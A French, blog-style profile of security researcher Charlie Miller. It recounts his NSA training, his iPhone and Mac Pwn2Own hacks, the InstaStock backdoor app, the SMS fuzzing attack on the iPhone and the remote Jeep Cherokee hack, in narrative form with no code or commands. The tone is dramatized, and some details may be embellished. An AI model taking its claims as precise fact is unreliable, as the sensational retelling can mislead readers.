Prof d’université ? Il n’a pas envie de passer sa vie à publier des papers que personne ne lira sur un sujet ultra-niche qui ne le passionne plus vraiment. Les labos de recherche privés ? Ils préfèrent les ingénieurs aux mathématiciens purs. Quant au secteur privé classique, peu d’entreprises ont besoin d’un expert en propagation d’ondes dans les fibres optiques. Wall Street peut-être ? Mais l’idée de devenir un quant pour optimiser des algorithmes de trading haute fréquence ne l’emballe pas.
C’est alors que la NSA entre en scène. L’agence de renseignement américaine la plus secrète au monde recrute des mathématiciens à tour de bras pour faire de la cryptographie et de la cryptanalyse. Pour eux, un PhD en maths de Notre Dame, c’est du pain béni car ils voient au-delà des solitons optiques : ils voient un cerveau capable de manipuler des concepts mathématiques abstraits complexes, soit exactement ce qu’il faut pour casser des codes. Charlie accepte l’offre, un peu par défaut, un peu par curiosité et en 2000, débarque à Fort Meade, dans le Maryland, au QG de l’agence qui écoute le monde entier. Le bâtiment est une forteresse de verre noir, entourée de barbelés et de checkpoints. Bienvenue dans le monde de l’espionnage.
Le quartier général de la NSA à Fort Meade, Maryland, où Charlie a travaillé de 2000 à 2005
À la NSA, Charlie est officiellement cryptographe dans la division mathématique. Son boulot officiel est de développer et casser des algorithmes de chiffrement, analyser des protocoles cryptographiques, chercher des failles dans les systèmes de communication ennemis. Mais rapidement, il découvre un nouveau terrain de jeu : la sécurité informatique opérationnelle. La NSA ne fait pas que de la crypto théorique, elle fait aussi du hacking offensif. Et pour ça, elle propose des formations internes dans tous les domaines : exploitation de vulnérabilités, reverse engineering, développement d’exploits, techniques d’intrusion avancées. Charlie s’inscrit à tout ce qu’il peut. Il est comme un gamin dans un magasin de bonbons.
“Même si j’ai été embauché comme mathématicien à la NSA, ils proposaient divers programmes de formation. J’ai commencé par suivre une formation en sécurité informatique et j’ai occupé des postes qui mettaient l’accent sur cette compétence.”, expliquera-t-il. Et c’est là que sa formation mathématique devient un atout majeur. Car là où d’autres voient du code, lui voit des patterns, des structures, des failles logiques. Son cerveau mathématique lui permet de comprendre intuitivement comment les systèmes peuvent être cassés. C’est alors le début d’une transformation radicale.
Le mathématicien théoricien devient hacker opérationnel. Et pas n’importe quel hacker : un hacker de la NSA, formé par les meilleurs, avec accès aux outils et aux connaissances les plus pointus du renseignement américain. L’équipe Tailored Access Operations (TAO), l’élite du hacking à la NSA, devient son terrain de jeu.
Alors durant cinq ans, Charlie va apprendre les ficelles du métier au plus haut niveau. Comment exploiter une faille de buffer overflow dans un système embarqué. Comment contourner l’ASLR et le DEP. Comment développer des exploits fiables qui marchent à tous les coups. Comment penser comme un attaquant tout en gardant l’objectif stratégique en tête.
La NSA, c’est l’école du hacking version hardcore, avec des moyens illimités. Pas de place pour les amateurs ou les script kiddies. Chaque jour, il côtoie des génies de la sécurité qui chassent des espions chinois, russes et iraniens dans le cyberespace. Il participe à des opérations dont il ne pourra jamais parler, développe des outils qui resteront classifiés pendant des décennies.
Mais en 2005, après cinq ans dans les entrailles de Big Brother, Charlie en a marre. Le monde de l’espionnage, c’est excitant les premiers mois, mais ça devient vite frustrant. Tout ce que vous faites est classifié Top Secret/SCI. Vous ne pouvez jamais parler de vos exploits, même à votre femme et vos découvertes restent enfermées dans des SCIFs (Sensitive Compartmented Information Facilities).
Vous trouvez une faille critique dans un système utilisé par des millions de personnes ? Tant mieux, on va l’exploiter pour espionner, pas la corriger et pour quelqu’un de créatif comme Charlie, qui aime partager ses connaissances et voir l’impact concret de son travail, c’est étouffant. “Je ne suis toujours pas en mesure de discuter des détails de mon passage à la NSA, à part quelques vagues références à des cibles étrangères et à la reconnaissance de réseaux informatiques.”, dira-t-il des années plus tard, toujours lié par son serment de confidentialité.
Il quitte alors la NSA et devient consultant principal en sécurité chez Independent Security Evaluators (ISE), une petite boîte de Baltimore fondée par des anciens de la NSA. Enfin libre ! Il peut maintenant hacker légalement et publiquement. Fini les opérations secrètes, place à la recherche en sécurité au grand jour. ISE fait du pentest pour des grandes entreprises, mais encourage aussi ses employés à faire de la recherche publique et c’est là que sa carrière explose vraiment.
Le 29 juin 2007, Apple lance l’iPhone et c’est une révolution. Un ordinateur Unix complet dans votre poche, avec un écran tactile. Le monde entier est en émoi et les files d’attente devant les Apple Store font le tour du monde. Charlie regarde ce bijou de technologie avec son œil de hacker et se dit : “Je parie que je peux le casser.” Il achète alors un iPhone le jour de la sortie (550 dollars quand même !), rentre chez lui et se met au boulot.
Il commence par analyser le système, chercher des vecteurs d’attaque… Safari Mobile semble prometteur… et quelques semaines plus tard, bingo ! Il trouve une faille dans le parseur TIFF de Safari Mobile qui permet de prendre le contrôle total de l’appareil via une image malveillante. Il devient officiellement le premier au monde à hacker publiquement l’iPhone. Apple n’est pas content du tout mais Charlie s’en fout royalement. Il a trouvé sa nouvelle vocation : casser les produits Apple pour les rendre plus sûrs. Et il est doué. Très, très doué.
Mars 2008, Vancouver. C’est l’heure du Pwn2Own, le championnat du monde officieux du hacking. Organisé par la Zero Day Initiative pendant la conférence CanSecWest, c’est LE concours où les meilleurs hackers de la planète viennent montrer leur talent. Les règles sont simples mais brutales : le premier qui réussit à compromettre complètement une machine via une vulnérabilité zero-day gagne le cash et la machine. Cette année-là, la cible star, c’est le MacBook Air qu’Apple vient de sortir deux mois plus tôt. Ultra-fin (1,94 cm le plus épais !), ultra-cher (1 799 dollars en version de base), ultra-sécurisé selon la Pomme. Souvenez-vous, Steve Jobs l’a présenté en le sortant d’une enveloppe en papier kraft. Encore un coup de génie marketing.
L’arène du Pwn2Own où les meilleurs hackers s’affrontent pour casser les systèmes les plus sécurisés
Charlie arrive tranquille, en jean et t-shirt, son laptop sous le bras. Il a passé des semaines à préparer son attaque en secret. Il a trouvé une faille dans la bibliothèque PCRE (Perl Compatible Regular Expressions) utilisée par Safari. Il s’agit d’une faille dans le traitement des expressions régulières qui était publique depuis février 2007 mais qu’Apple n’avait toujours pas corrigée un an plus tard. Négligence ou incompétence ? Peu importe, c’est du pain béni pour Charlie et pour cela, il a développé un exploit ultra-fiable qui contourne toutes les protections : ASLR, sandboxing, tout y passe.
Le jour J arrive enfin. La salle est bondée. Des journalistes, des chercheurs en sécurité, des représentants des vendeurs… Tout le monde retient son souffle. Charlie s’assoit devant le MacBook Air flambant neuf. Il lance Safari, tape l’URL de son serveur malveillant. La page se charge. Elle contient juste une ligne de texte : “PWNED”. Deux minutes chrono. Le MacBook Air est compromis. Charlie a un shell root et peut faire ce qu’il veut de la machine. Il lance Calculator.app pour prouver l’exécution de code. Game over. 10 000 dollars dans la poche et un MacBook Air gratuit. Une foule de geeks l’acclame, les flashs crépitent. Charlie Miller vient d’entrer dans la légende du hacking.
Mais Charlie reste modeste. “L’attaque a duré deux minutes, mais la recherche a pris beaucoup plus de temps.”, précisera-t-il plus tard. “J’ai passé de nombreux jours à faire des recherches et à rédiger l’exploit avant le jour de la compétition. C’est comme quand les gens regardent un match : ils voient le résultat, mais ils ne voient pas toutes les années d’entraînement...” C’est ça, le vrai hacking : 99% de préparation minutieuse, 1% d’exécution spectaculaire. Les médias ne montrent évidemment que la partie visible de l’iceberg.
L’année suivante, en 2009, rebelote. Charlie revient à Pwn2Own et défonce Safari sur Mac OS X 10.5.6 en quelques secondes cette fois. 5 000 dollars de plus (le prix a baissé, la crise est passée par là). La faille ? Un bug dans le parseur de polices de Safari. Puis en 2010, il récidive encore, exploitant cette fois une vulnérabilité dans le traitement des PDF. 10 000 dollars cette fois. Trois victoires d’affilée sur Mac. Du jamais vu dans l’histoire du concours. Même les organisateurs commencent à se demander s’il ne faudrait pas créer une catégorie “Charlie Miller” à part. Les médias le surnomment le “serial killer d’Apple”, le “cauchemar de Cupertino”.
Mais Charlie commence à en avoir sérieusement marre de ce petit jeu. Chaque année, il trouve des failles critiques, Apple les corrige (souvent après des mois de retard), et l’année suivante il en trouve d’autres. C’est un cycle sans fin qui n’améliore pas vraiment la sécurité fondamentale des produits. C’est du colmatage, pas de l’architecture sécurisée. Alors en 2010, après sa troisième victoire consécutive, il lance sa campagne provocatrice “NO MORE FREE BUGS” avec Dino Dai Zovi et Alex Sotirov.
“Les vulnérabilités ont une valeur marchande, il est donc absurde de travailler dur pour trouver un bug, écrire un exploit et ensuite le donner gratuitement.”, déclare-t-il lors d’une conférence de presse improvisée. Et il a totalement raison. Sur le marché gris et noir, une faille iOS zero-day peut se vendre entre 100 000 et 2 millions de dollars selon sa criticité. Des sociétés comme Zerodium ou Azimuth Security sont prêtes à payer des fortunes et les agences de renseignement aussi.
Alors pourquoi donner gratuitement ces failles à Apple qui fait des dizaines de milliards de bénéfices par trimestre et traite les chercheurs en sécurité comme des emmerdeurs ? La communauté est divisée. Certains l’accusent de mercantilisme, d’autres applaudissent son pragmatisme.
Mais le coup le plus spectaculaire et audacieux de Charlie contre Apple, c’est en 2011 quand il découvre une faille architecturale majeure dans iOS. Pour accélérer JavaScript dans Safari Mobile, Apple a créé une exception dans sa politique de signature de code, permettant au navigateur d’exécuter du code non signé avec des privilèges élevés. Charlie réalise qu’il peut exploiter cette exception depuis n’importe quelle app et pour le démontrer de manière spectaculaire, il crée une application appelée InstaStock. En apparence, c’est une app banale qui affiche des cours de bourse en temps réel. Interface minimaliste, fonctionnalités basiques. Le genre d’app qu’Apple valide sans même regarder. Et c’est exactement ce qui se passe : Apple l’approuve et la publie sur l’App Store en septembre 2011.
Sauf qu’InstaStock cache un terrible secret. Une backdoor sophistiquée. Une fois installée, l’app se connecte discrètement à un serveur C&C (Command & Control) chez Charlie, dans son sous-sol à St. Louis. De là, il peut télécharger et exécuter n’importe quel code arbitraire sur l’iPhone, contournant complètement le sandboxing iOS. Lire tous les contacts, activer le micro pour écouter les conversations, prendre des photos avec la caméra, tracker la position GPS, voler les mots de passe du trousseau… Apple a validé un cheval de Troie militarisé. Le loup est dans la bergerie.
Charlie attend patiemment. Septembre passe, octobre aussi… Et Apple ne remarque absolument rien. Des milliers d’utilisateurs téléchargent InstaStock puis en novembre, après deux mois d’attente, il en a marre de ce silence assourdissant. Il décide de forcer la main d’Apple et poste une vidéo sur YouTube où il montre comment il contrôle un iPhone à distance via son app. On le voit taper des commandes sur son laptop, et l’iPhone à côté réagit instantanément : lecture des SMS, activation du vibreur, accès aux photos… C’est la démonstration ultime que l’App Store n’est pas le jardin clos sécurisé qu’Apple prétend. Il prévient aussi Andy Greenberg de Forbes (le journaliste qui avait couvert ses exploits précédents) qui écrit alors un article explosif : “iPhone Hacker Charlie Miller Reveals His Apple App Store Spyware”.
La réaction d’Apple est immédiate, brutale et sans appel. Quelques heures seulement après la publication de l’article de Forbes, Charlie reçoit un email glacial du Developer Relations d’Apple : “La présente lettre constitue une notification de résiliation du Contrat de licence du programme pour développeurs iOS entre vous et Apple, avec effet immédiat. Vous ne pourrez plus soumettre de nouvelles applications ou mises à jour à l’App Store.”
Banni. Viré. Blacklisté. Persona non grata. Apple vient de kicker celui qui les a aidés à corriger des dizaines de failles critiques au fil des ans. L’ironie est mordante.
“Je suis en colère. Je leur signale tout le temps des bogues. Le fait de faire partie du programme des développeurs m’aide à le faire. Ils se font du mal à eux-mêmes et me rendent la vie plus difficile”, rage Charlie dans une série de tweets vengeurs. Mais Apple s’en contrefiche. Pour eux, Miller a franchi la ligne rouge en publiant délibérément une app malveillante et en l’exploitant publiquement. C’est une violation flagrante des conditions d’utilisation, peu importe qu’il l’ait fait pour démontrer une faille de sécurité critique.
La communauté de la sécurité est outrée. Comment Apple peut-il bannir quelqu’un qui les aide gratuitement à sécuriser leurs produits ? Mais Cupertino reste inflexible. Charlie Miller est désormais persona non grata dans l’écosystème iOS.
Apple a banni Charlie Miller de son programme développeur après l’incident InstaStock
Mais malgré cela, Charlie ne chôme pas. Avec Collin Mulliner, un chercheur allemand spécialisé dans la sécurité mobile qu’il a rencontré aux conférences, il s’attaque à un nouveau défi titanesque : la sécurité des SMS sur iPhone. Les SMS, c’est le talon d’Achille de tous les téléphones. Un protocole ancien, mal sécurisé, qui traite des données non fiables venant du réseau.
Le duo développe alors un outil de fuzzing sophistiqué capable de bombarder les téléphones de centaines de milliers de SMS malformés pour trouver des crashs exploitables. L’outil, qu’ils baptisent “SMS Fuzzer”, s’insère entre le processeur et le modem du téléphone, simulant la réception de SMS sans avoir à les envoyer réellement sur le réseau (ce qui coûterait une fortune et alerterait les opérateurs).
Après des mois de fuzzing intensif, bingo ! Ils découvrent une faille absolument terrifiante dans l’iPhone. Un bug dans le décodage des SMS PDU (Protocol Data Unit) qui provoque une corruption mémoire exploitable. Le bug est dans CommCenter, le daemon qui gère toutes les communications de l’iPhone. Game over une nouvelle fois pour Apple.
Et le potentiel est cauchemardesque puisqu’en envoyant une série de 512 SMS spécialement forgé (dont un seul apparaît à l’écran sous forme d’un simple carré), ils peuvent prendre le contrôle total de n’importe quel iPhone à distance. Pas besoin que la victime clique sur quoi que ce soit. Pas besoin qu’elle ouvre le message. Il suffit que son téléphone reçoive les SMS. C’est l’attaque parfaite : invisible, indétectable, imparable. Un véritable missile guidé numérique.
“Les SMS constituent un incroyable vecteur d’attaque pour les téléphones mobiles. Tout ce dont j’ai besoin, c’est de votre numéro de téléphone. Je n’ai pas besoin que vous cliquiez sur un lien, que vous visitiez un site web ou que vous fassiez quoi que ce soit.”, explique Charlie. C’est le hack ultime : totalement passif pour la victime, totalement actif pour l’attaquant. Avec cette faille, on peut espionner n’importe qui sur la planète du moment qu’on a son numéro. Chefs d’État, PDG, journalistes, activistes… Personne n’est à l’abri.
Juillet 2009, Las Vegas. Black Hat, la plus grande conférence de sécurité au monde. Le Mandalay Bay Convention Center grouille de hackers, de fédéraux et de vendeurs de solutions de sécurité. Charlie et Collin montent sur la scène principale pour présenter leur découverte. Il y a 3000 personnes dans la salle. “Fuzzing the Phone in Your Pocket”, annonce le titre sobre de leur présentation. Dans le public, Elinor Mills, une journaliste respectée de CNET, sert courageusement de cobaye. Elle a donné son numéro de téléphone et attend, iPhone 3GS à la main.
Black Hat, où Charlie et Collin ont démontré le hack SMS dévastateur de l’iPhone
Charlie lance alors l’attaque depuis son laptop. 512 SMS partent vers le téléphone d’Elinor. Sur scène, un écran géant montre les logs en temps réel. Le public voit les paquets partir, le réseau les acheminer. Soudain, l’iPhone d’Elinor se fige. L’écran devient noir. Puis il redémarre. Quand il revient à la vie, Charlie a le contrôle total. Il fait vibrer le téléphone à distance. Ouvre l’appareil photo. Lit les contacts. La salle est médusée. Certains filment avec leur propre iPhone, réalisant soudain la vulnérabilité de leur appareil.
“Un instant, je parle à Miller et l’instant d’après, mon téléphone est mort.”, raconte Mills, encore sous le choc. “Ensuite, il se rallume mais je ne peux pas passer d’appels. Il est complètement sous leur contrôle. C’était terrifiant.”
La démo est un triomphe total. Le public est en standing ovation. Twitter s’enflamme. La nouvelle fait le tour du monde en quelques heures et Apple, qui avait été prévenu un mois plus tôt mais n’avait rien fait (classique), se réveille enfin. Le lendemain matin, coup de théâtre : Apple sort iOS 3.0.1 en urgence absolue qui corrige la faille. Un patch d’urgence un samedi matin, du jamais vu chez Apple. La pression médiatique a payé.
Cette histoire SMS est typique de l’approche Charlie Miller. Il ne se contente pas de trouver des bugs mineurs. Il trouve des bugs critiques, architecturaux, qui remettent en question la sécurité fondamentale des systèmes. Il démontre leur dangerosité de manière spectaculaire et indéniable et il force les vendeurs à réagir en rendant ses recherches publiques. C’est du “responsible disclosure” version commando : on prévient discrètement, mais si rien ne bouge, on sort l’artillerie lourde.
En 2012, Twitter cherche désespérément à renforcer sa sécurité. La plateforme a été hackée plusieurs fois, des comptes de célébrités compromis, des données volées. Ils ont besoin du meilleur. Dick Costolo, le CEO, donne alors carte blanche pour recruter. Ils appellent Charlie. L’ironie est délicieuse : banni par Apple pour avoir trop bien fait son travail, il est recruté par Twitter pour exactement les mêmes raisons. Charlie rejoint donc l’équipe de sécurité produit comme chercheur principal et pentester. Son boulot : casser Twitter avant que les méchants ne le fassent. Trouver les failles, développer les exploits, proposer les corrections.
Twitter a recruté Charlie Miller après qu’Apple l’ait banni
Pendant trois ans, Charlie va bosser dans les bureaux de Twitter à San Francisco, au cœur de SoMa. Il trouve des dizaines de vulnérabilités critiques, améliore l’architecture de sécurité, forme les développeurs. Mais en 2015, un nouveau défi titanesque l’attend. Un défi qui va révolutionner non pas l’industrie tech, mais l’industrie automobile et changer à jamais notre perception de la sécurité des voitures modernes.
Charlie rencontre Chris Valasek à une conférence de sécurité. Chris, c’est son alter ego. Un autre génie de la sécurité, spécialisé dans les systèmes embarqués et l’IoT. Directeur de recherche chez IOActive, il a le même état d’esprit que Charlie : casser les trucs pour les rendre plus sûrs. Les deux compères se découvrent une passion commune complètement folle : et si on hackait des voitures ? Pas des vieilles caisses avec des systèmes simples, non, non, des voitures modernes, connectées, bourrées d’électronique et d’ordinateurs. Des data centers sur roues.
Ils commencent alors modestement en 2013. Avec une bourse de 80 000 dollars de la DARPA (l’agence de recherche du Pentagone), ils s’attaquent à une Ford Escape et une Toyota Prius de 2010. Ils achètent les voitures d’occasion, les démontent, analysent les systèmes. Avec des câbles OBD-II branchés directement sur le bus CAN (Controller Area Network), le réseau qui connecte tous les calculateurs de la voiture, ils arrivent à tout contrôler : direction, freins, accélération, tableau de bord… C’est flippant, mais il faut être physiquement dans la voiture avec un laptop et des câbles partout. Pas très pratique pour une attaque réelle. Leur paper “Adventures in Automotive Networks and Control Units” fait sensation à DEF CON, mais l’industrie automobile balaie leurs inquiétudes d’un revers de main. “Il faut un accès physique, ce n’est pas réaliste”, disent les constructeurs.
Charlie et Chris veulent alors aller plus loin. Beaucoup plus loin. Ils veulent prouver qu’on peut hacker une voiture à distance, sans fil, comme dans les films. Une attaque vraiment dangereuse. Ils passent des mois à étudier les voitures connectées du marché et leur choix se porte sur la Jeep Cherokee de 2014. Pourquoi ? Parce qu’elle a Uconnect, un système d’infodivertissement ultra-moderne connecté à Internet via le réseau cellulaire Sprint. GPS, streaming audio, hotspot Wi-Fi, diagnostics à distance… Bref, une voiture avec une adresse IP publique. Le rêve absolu de tout hacker. Ou le cauchemar de tout conducteur, selon le point de vue.
La Jeep Cherokee 2014, première voiture hackée à distance par Miller et Valasek
Pendant des mois, dans le garage de Chris, Charlie et lui dissèquent méthodiquement le système Uconnect. Ils dumpent le firmware, analysent les binaires, tracent les communications réseau. C’est un travail de titan car le système est complexe, avec plusieurs processeurs, des OS différents (QNX pour l’unité principale, ThreadX pour le modem), des protocoles propriétaires. Mais petit à petit, ils remontent la chaîne. Ils trouvent des ports ouverts (6667, 4321, 51966), des services mal configurés, des mots de passe par défaut, l’absence de signature sur les mises à jour firmware. Une vraie passoire. Harman, le fabricant du système, a fait du beau hardware mais a complètement négligé la sécurité logicielle.
D’abord, ils obtiennent l’accès au système d’infodivertissement et de là, ils découvrent qu’ils peuvent reflasher le firmware du chip V850 qui fait le pont avec le bus CAN. Une fois ce firmware modifié, ils ont accès en écriture au bus CAN de la voiture. Game over ! Ils peuvent envoyer n’importe quelle commande CAN, se faisant passer pour n’importe quel calculateur. Cela veut dire que si le calculateur de frein pense recevoir des ordres du calculateur central, et bien il obéit aveuglément. Pas d’authentification, pas de chiffrement, rien. Les voitures sont conçues en supposant que le bus CAN est de confiance. Grosse erreur !!
Été 2015. Après presque deux ans de recherche, ils sont enfin prêts pour la démo de leur vie. Ils contactent Andy Greenberg de Wired (oui, encore lui, c’est devenu leur journaliste attitré) et leur plan est simple mais terrifiant : Greenberg conduira une Jeep Cherokee sur l’autoroute pendant que Charlie et Chris la hackeront depuis le canapé de Charlie, à 10 miles de distance. Une attaque 100% remote, sans aucun accès physique préalable à la voiture. Du jamais vu.
Le jour J, Greenberg prend le volant. Il est nerveux, et on le comprend. Il roule sur l’Interstate 64 près de St. Louis, une autoroute à 4 voies où les camions foncent à 70 mph. Charlie et Chris sont dans le sous-sol de Charlie, devant leurs laptops. Ils se connectent à la Jeep via le réseau Sprint. D’abord, ils s’amusent. La clim se met à fond. La radio passe du hip-hop de Skee-lo à volume maximum. Les essuie-glaces s’activent, aspergeant le pare-brise de liquide lave-glace. Greenberg garde son calme. Il sait que c’est Charlie et Chris. Pour l’instant, c’est juste agaçant, pas dangereux.
Puis ça devient très, très sérieux. Sans prévenir, le moteur coupe. En pleine autoroute. À 70 mph. Greenberg appuie sur l’accélérateur. Rien. La Jeep de 2 tonnes commence à ralentir rapidement. Dans le rétroviseur, il voit un semi-remorque Mack qui arrive à toute vitesse. La panique monte. Il sue à grosses gouttes. Les mains crispées sur le volant, il se déporte sur la voie de droite, évitant de justesse de se faire emboutir. La Jeep continue de ralentir. 60 mph, 50, 40… Les voitures le doublent en klaxonnant furieusement. Certains conducteurs lui font des doigts d’honneur, pensant qu’il est saoul ou qu’il textote.
“Je vais m’arrêter !”, crie Greenberg dans son téléphone. “NON ! NON ! Continue de conduire !”, répondent Charlie et Chris. Ils veulent que la démo soit réaliste. Pas de complaisance. Finalement, après 30 secondes d’angoisse pure (qui ont dû paraître des heures), ils relancent le moteur. Greenberg peut à nouveau accélérer. Il tremble encore. “J’ai besoin d’une bière”, dira-t-il plus tard. On le comprend.
Mais Charlie et Chris ne sont pas sadiques. “Nous aurions pu être beaucoup plus méchants.”, confiera Charlie plus tard avec son sourire malicieux. “Nous aurions pu tourner le volant ou désactiver les freins à 110 km/h. Mais nous n’essayons pas de tuer quelqu’un, nous voulons juste prouver quelque chose.” Et quel preuve ! Ils viennent de démontrer qu’on peut assassiner quelqu’un à distance via Internet. Plus besoin de scier les câbles de frein ou de trafiquer la direction. Une connexion 3G suffit.
L’article de Wired, publié le 21 juillet 2015, fait alors l’effet d’une bombe atomique dans l’industrie automobile. “Hackers Remotely Kill a Jeep on the Highway - With Me in It”. Les médias du monde entier reprennent l’histoire. CNN, BBC, Fox News, Le Monde, Der Spiegel… Charlie et Chris sont partout. Les images de la Jeep incontrôlable sur l’autoroute font le tour du monde, et évidemment, les actions de Fiat Chrysler chutent. Les politiques s’en mêlent également. Les sénateurs Ed Markey et Richard Blumenthal déposent un projet de loi sur la cybersécurité automobile. Bref, c’est la panique totale à Detroit.
Wired Magazine a publié l’article explosif sur le hack de la Jeep qui a changé l’industrie
Fiat Chrysler réagit en mode crise absolue. Le 24 juillet 2015, trois jours après l’article, ils annoncent le rappel immédiat de 1,4 million de véhicules. 1,4 MILLION ! C’est le premier rappel de masse de l’histoire automobile pour un problème de cybersécurité. Pas de pièce défectueuse, pas de problème mécanique. Juste du code bugué. Ils envoient des clés USB à tous les propriétaires pour patcher le système Uconnect. Ils coupent aussi l’accès Sprint aux ports vulnérables côté réseau. Le coût total ? Plus de 500 millions de dollars entre le rappel, les patchs, les amendes et les procès. Sans compter les dégâts à leur réputation.
“C’est la première fois qu’un produit fabriqué en série fait l’objet d’un rappel physique en raison d’un problème de sécurité logiciel.”, note Charlie avec une pointe de fierté. Il a raison. C’est historique. Un moment charnière dans l’industrie automobile, qui se croyait à l’abri dans son monde de mécanique et d’ingénierie traditionnelle, et qui vient de réaliser brutalement qu’elle fait maintenant partie du monde numérique. Les voitures ne sont plus des objets mécaniques avec un peu d’électronique. Ce sont des ordinateurs sur roues, avec tous les risques que cela implique. Et comme tous les ordinateurs, elles peuvent être hackées. Par des ados dans leur chambre. Par des criminels. Par des services de renseignement. Par des terroristes.
La NHTSA (National Highway Traffic Safety Administration) inflige alors une amende record de 105 millions de dollars à Fiat Chrysler pour avoir mis en danger la vie des conducteurs. C’est d’ailleurs la plus grosse amende de l’histoire de l’agence et le message est clair : la cybersécurité automobile n’est plus optionnelle. C’est une question de vie ou de mort. Littéralement.
L’avis de rappel historique de 1,4 million de véhicules suite au hack de Miller et Valasek
Charlie et Chris deviennent instantanément les rock stars de la cybersécurité automobile. Tout le monde veut les recruter. Les constructeurs, terrifiés, réalisent qu’ils ont besoin de vrais experts en sécurité, pas juste des ingénieurs qui bricolent. Alors en août 2015, un mois après le hack de la Jeep, Uber les embauche tous les deux. La boîte de VTC mise gros sur les voitures autonomes avec son programme Advanced Technologies Group à Pittsburgh et ils ont besoin des meilleurs pour sécuriser leur future flotte de robotaxis. Alors qui de mieux que les deux mecs qui ont réveillé toute l’industrie ?
Chez Uber, Charlie et Chris deviennent les architectes de la sécurité des véhicules autonomes. Un défi colossal car si hacker une Jeep Cherokee est dangereux, imaginez hacker une flotte entière de voitures sans conducteur. C’est Terminator puissance 1000. Ils mettent en place des processus de sécurité drastiques : revue de code systématique, tests d’intrusion continus, architecture sécurisée by design, chiffrement de bout en bout, authentification mutuelle entre composants… Fini l’amateurisme de l’industrie automobile traditionnelle.
Mais le duo mythique ne reste pas longtemps ensemble. En mars 2017, après 18 mois chez Uber, Charlie reçoit une offre impossible à refuser. Didi Chuxing, le “Uber chinois” qui a racheté les opérations d’Uber en Chine, veut créer un lab de sécurité automobile aux États-Unis et ils lui proposent de le diriger, avec un salaire mirobolant et une équipe à rassembler. Charlie accepte et pour la première fois depuis le hack de la Jeep, les deux compères sont séparés. Chris, lui, reste chez Uber comme responsable de la sécurité véhicule.
Malheureusement, l’aventure Didi est courte. Très courte. Quatre mois seulement pour que Charlie réalise vite que bosser pour une boîte chinoise depuis la Californie, c’est mission impossible. Les différences culturelles sont énormes sans parler des réunions à 2h du matin pour s’aligner avec Beijing ou encore de la barrière de la langue (Charlie ne parle pas mandarin). Et surtout, les objectifs business sont flous. C’est une bureaucratie kafkaïenne alors en juillet 2017, il jette l’éponge. “Ce fut une expérience intéressante, mais qui ne me convenait finalement pas.”, dira-t-il diplomatiquement. Traduction : c’était l’enfer.
Mais Chris a un plan. Pendant que Charlie galérait chez Didi, il a négocié en secret avec Cruise Automation, la filiale de General Motors spécialisée dans les voitures autonomes. Rachetée pour plus d’un milliard de dollars en 2016, Cruise est le concurrent direct de Waymo (Google) et d’Uber dans la course aux robotaxis. Ils veulent construire l’équipe de sécurité la plus solide du secteur alorrs Chris leur dit : “Je viens, mais seulement si vous prenez Charlie aussi.” Deal. Et en juillet 2017, juste après que Charlie ait quitté Didi, ils annoncent rejoindre Cruise ensemble. Les “Jeep hackers” sont réunis. L’équipe de choc est reformée.
Chez Cruise, Charlie devient alors Principal Autonomous Vehicle Security Architect, et Chris Team Lead of Security et leur mission est de s’assurer que personne ne puisse faire aux voitures autonomes de GM ce qu’ils ont fait à la Jeep Cherokee. C’est un défi titanesque puisqu’un voiture autonome Cruise, c’est +40 calculateurs, des millions de lignes de code, des dizaines de capteurs (LiDAR, caméras, radars, ultrasons), des connexions permanentes au cloud pour les mises à jour et la télémétrie, de l’IA qui prend des décisions critiques 10 fois par seconde. Chaque composant est une porte d’entrée potentielle et chaque ligne de code est une vulnérabilité possible.
“Une fois que j’ai écrit un exploit capable de contrôler une automobile, j’ai compris que les choses devenaient sérieuses”, confie Charlie dans une rare interview. “Il ne s’agit plus de voler des cartes de crédit ou de défacer des sites web. Il s’agit de missiles de deux tonnes qui se déplacent tout seuls dans les villes.”
Et il a raison d’être inquiet car si quelqu’un hacke une flotte de robotaxis, c’est potentiellement un massacre. Imaginez 100 voitures autonomes qui accélèrent en même temps dans une foule. C’est le scénario cauchemardesque que Charlie et Chris doivent empêcher.
Le travail chez Cruise est fascinant mais ultra-confidentiel et Charlie ne peut plus faire de démos spectaculaires ou publier ses recherches. Il est redevenu, d’une certaine manière, l’agent secret qu’il était à la NSA. La différence ? Cette fois, il protège des vies humaines directement alors chaque faille qu’il trouve et corrige, c’est potentiellement un accident évité, des morts empêchées.
Le Cruise Origin, véhicule autonome sans volant ni pédales, sécurisé par l’équipe de Charlie Miller
Aujourd’hui, fin 2025, Charlie Miller continue de bosser chez Cruise. À 52 ans, il est une légende vivante de la cybersécurité. Le gamin solitaire d’Affton qui avait perdu sa mère trop tôt est devenu l’un des hackers les plus respectés et influents de la planète. Pas étonnant quand on voit son palmarès absolument hallucinant. Premier à hacker publiquement l’iPhone (2007). Premier à hacker Android - il a défoncé le T-Mobile G1 le jour même de sa sortie (2008). Quatre fois champion de Pwn2Own (2008, 2009, 2010, 2011) - un record encore inégalé. Des dizaines de failles critiques découvertes dans Safari, iOS, Mac OS X. Le hack SMS de l’iPhone qui a forcé Apple à patcher en urgence (2009). L’affaire InstaStock qui lui a valu son bannissement d’Apple (2011). Et bien sûr, LE hack de la Jeep Cherokee (2015) qui a changé pour toujours l’industrie automobile et créé le domaine de la cybersécurité automobile. Sans oublier ses contributions continues à la sécurité de Twitter, Uber, Didi et maintenant Cruise.
Mais ce qui frappe le plus chez Charlie, au-delà de ses exploits techniques, c’est sa philosophie. Il ne hacke pas pour la gloire, l’argent ou le chaos (même s’il ne crache pas sur les 10 000 dollars de Pwn2Own). Il hacke pour rendre le monde numérique plus sûr car chaque faille qu’il trouve et rapporte, c’est une faille que les vrais méchants (criminels, espions, terroristes…) ne pourront pas exploiter. Charlie est un white hat dans l’âme.
“J’ai essentiellement appris sur le tas, ce qui est une excellente façon de faire si vous le pouvez”, dit-il de ses débuts à la NSA. Cette humilité, c’est sa marque de fabrique car malgré son CV stratosphérique, Charlie reste accessible, drôle, humble. Sur Twitter (@0xcharlie), il partage ses réflexions sur la sécurité, plaisante avec la communauté, donne des conseils aux jeunes hackers. Pas de condescendance, pas d’élitisme.
@0xcharlie reste actif sur les réseaux sociaux pour partager ses connaissances avec la communauté
L’histoire de Charlie Miller, c’est aussi l’histoire de l’évolution du hacking et de la cybersécurité. Dans les années 2000, c’était encore un truc de geeks dans leur garage, un hobby pour étudiants en informatique et aujourd’hui, c’est un enjeu de sécurité nationale, un secteur qui pèse des milliards, une arme de guerre. Les voitures, les téléphones, les infrastructures critiques, les implants médicaux, les centrales nucléaires… tout est connecté, tout est hackable. Le monde physique et le monde numérique ont fusionné, avec toutes les opportunités et tous les dangers que cela implique.
